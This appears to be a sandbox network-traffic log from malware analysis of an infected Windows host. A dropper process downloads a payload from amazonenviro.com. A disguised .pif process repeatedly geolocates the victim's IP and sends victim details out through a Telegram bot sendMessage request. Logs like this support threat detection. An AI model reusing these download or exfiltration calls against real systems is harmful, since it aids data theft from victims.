X-Request-ID: d05b1977b027009a1535b362975b373e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49744 | 166.62.27.188 | 443 | 7884 | C:\Windows\SysWOW64\brightness.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:18 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: amazonenviro.com
2025-01-06 06:53:18 UTC | 269 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:18 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Sun, 05 Jan 2025 22:51:42 GMT
ETag: "2ca99b3-bf154-62afd5b0ab63f"
Accept-Ranges: bytes
Content-Length: 782676
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49754 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:26 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:53:27 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:27 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461196
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQYA74Emnvgx4fgfPceDpY4FAU72XZxy8UN5y%2FdZFvMrOxAcpOh1gErOG3Sdm5LHFzjGj%2BR54xMBOuzY%2FURlSeFEqnjH14bkKUbwZH1p7AGJs7rqy3abyBoO2GxrzOnK3l1DQmpA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9ca8409af7c6c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1941&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1458541&cwnd=196&unsent_bytes=0&cid=7bcf6482e2a2a332&ts=171&x=0"
2025-01-06 06:53:27 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.449755188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:27 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:27 UTC865INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:27 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461197
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMV%2FJBt4PTLSz%2FJ%2BwjTE%2FlGYhnrHuDPu2XylWv56y%2FYXSEl674RZDxCqrhFHkOdIgFJqIpZv%2BCmahfxGQ51xx9jNms7Tk0IuHGETdUlJHHc8Jr6%2BFX6g0ITe%2BZCcyNZ4uyxIISmA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca89396742d3-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1757&rtt_var=671&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=246&unsent_bytes=0&cid=41ae7dd0734f3146&ts=140&x=0"
2025-01-06 06:53:27 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49757 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:28 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:29 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:29 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461198
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VHfNdbZOnq%2BpJDmpwMdNBAz%2F4vxybzE9Axneq1WOOmHAzQ%2BMTK5MFKp7EhBSvzOmK3MdGGwZPGdhV0MYQsreZwpiIbwqJHFDyhtugza%2FavCLcC9TQumfJKLENU97J%2FrPayaPoHGd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca90de128c4b-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1975&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1422308&cwnd=232&unsent_bytes=0&cid=9a19e67bee1fced3&ts=155&x=0"
2025-01-06 06:53:29 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:30 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:30 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461200
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrQzBTyI4OugniH3i%2BYoU5AqSxrDi2OXf2VEZV6xeaaAxJbSGn5woIxuqV3LZfOqF8ZAIZl8or9vq1Joj5Of%2FeMCI99GWrF%2BAoiKonsBIefEdXJl9J4GguQe7S7WMH79D0cwYhtA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca9c291843c3-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1568&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1817050&cwnd=211&unsent_bytes=0&cid=365937ec4a19261e&ts=156&x=0"
2025-01-06 06:53:30 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49762 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:32 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:32 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:32 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461202
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hg5fgBqmJI9BXATHI3rfm3PrFgXs00Im6yQfk6vv76rPyvNd89uouyoFCfJhYk0fGFNYCME1QyTSB7RMEgTr%2FTnrSbH3EfkiWbG9ZEw0gfsOWNS1SE0wV8cKx5sHugXf9rCxtBOE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9caa85900186d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1650&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1662870&cwnd=250&unsent_bytes=0&cid=d5157c6751ad2942&ts=147&x=0"
2025-01-06 06:53:32 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49764 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:34 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:34 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:34 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461203
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLa%2BjgNalk3ow1RKdiEeDRes7gM61tZyEhPnPKyE0rAPXtVwYza0tR2q4ZbDmAUcm9BfV%2F3Au2vetdoQn9WOzWezWlYa27AbjcB0jsx1zkukedt9HWAp9lEb13HFQCjxdSWzO%2BkC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cab26cd4423d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1894&min_rtt=1888&rtt_var=721&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1505154&cwnd=186&unsent_bytes=0&cid=aa4733f712b1e7fe&ts=159&x=0"
2025-01-06 06:53:34 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49768 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:36 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:36 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:36 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461205
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6O8uLYD1aAqdbYnSxo4UtY0wxFXkg1E1f0FRiYq8RI2eh7Enj%2BD8Mgw%2ByIJ7V8f0v%2BMP8cVAad9PXpfg3QbfHwPNg8%2BDXD28d2sF1yPrRFVvBy%2BUs%2BEmBbJNI7tjabNIKFrdxUP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cac0986a42f2-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1609&rtt_var=631&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1814791&cwnd=222&unsent_bytes=0&cid=ff9f3a625036adb1&ts=152&x=0"
2025-01-06 06:53:36 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49771 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:37 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:38 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461207
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d36juYfaxaG8Wnd8zpJJNG%2F2PdjeB2iROJJcuIsSzvpwKcp0S7X61tPRMm47%2FMNSDYiikxrnj6MHNNqetAJjy2IVyONcQMqhO5%2FNkVySb%2BJJww8SIfsJn8r%2BmQCiD3GsBkDrJQaH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cac84d147d0b-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=1998&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1424390&cwnd=227&unsent_bytes=0&cid=ebb389e9c7a3b453&ts=160&x=0"
2025-01-06 06:53:38 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49773 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:38 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:38 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:38 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461207
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1i5c9y2mfMExnV9287jAew7u5iuQxtZII2F2dycHDz2UlXHFKCDcW7%2F6RzEbSgrDbfDbzK4oXzn4%2FhmjfJjrAAsSPArtQ3ejZafT21efs%2FfNU0llLHyn9GS%2BBK1ArV47uY1dUGo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cacd8f39424f-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1730&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1639528&cwnd=234&unsent_bytes=0&cid=6b7203a770df18b5&ts=180&x=0"
2025-01-06 06:53:38 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49775 | 188.114.96.3 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:39 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461208
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6fgVBPqMQEhqCvrwKfoHksfzwmNK7gJcZQmn0fZPRE3DERGUlTQj3p2miIGNslgjzzrjkk48gdICFMgdLbC016V5MJ4kV1e7P66juJN0wsSrohQxHHYUtkyHgUFbfrxbaD6BsB%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cad20bda422e-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1692&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1668571&cwnd=252&unsent_bytes=0&cid=737be7d23c28f0bc&ts=141&x=0"
2025-01-06 06:53:39 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49776 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:39 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:39 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461208
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7mnJHQqXwjES6%2FA0d%2Fc6G6k9mr4DS3S3quAZdFwPDkRoumqUbpspoNpRV2qfJargke6%2BobGlSCiXLhIsy3NAuKDhitYm1sbg6cs5L0ks4A5qlcrZniyTmbt4mDH22OG%2FGL1BoXFQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cad2ab0e4216-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1703&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1691772&cwnd=250&unsent_bytes=0&cid=e7307c3a6d7d319f&ts=145&x=0"
2025-01-06 06:53:39 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49778 | 149.154.167.220 | 443 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:40 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:40 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:40 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:53:40 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49780 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:40 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:40 UTC | 865 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:40 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461210
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61Of2rua6GdrRD8ohyBrjeNP149AYueo2iYXwWpYCdVYRsIdBLI5EMb9y7VCTgEIXk%2BmegObOG%2BUuCgG%2BEFZI%2BVMmsMOP9vcz26aX%2F%2BOpN%2BnkQ4FV%2BIfCfhtGSPeeU4oKb12avS0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cada5f0bc332-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1459&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1891191&cwnd=180&unsent_bytes=0&cid=7626122625b43608&ts=154&x=0"
                                                                                                                                                                        2025-01-06 06:53:40 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        14 | 192.168.2.4 | 49783 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
